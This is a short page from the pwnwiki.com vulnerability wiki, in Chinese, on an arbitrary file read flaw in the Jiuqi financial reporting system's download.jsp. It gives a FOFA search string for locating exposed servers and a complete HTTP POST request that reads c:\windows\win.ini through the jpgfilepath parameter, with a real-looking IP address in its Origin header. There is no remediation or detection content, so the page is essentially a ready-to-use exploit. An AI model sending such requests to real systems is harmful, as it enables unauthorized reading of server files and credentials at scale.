Loading
0

久其财务报表 download.jsp 任意文件读取漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

body="/netrep/"

漏洞利用

发送以下请求:

POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host: 
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.251.113.53:7002
Content-Type: application/x-www-form-urlencoded

jpgfilepath=c:\windows\win.ini

PWNWIK.COM==免费、自由、人人可编辑的漏洞库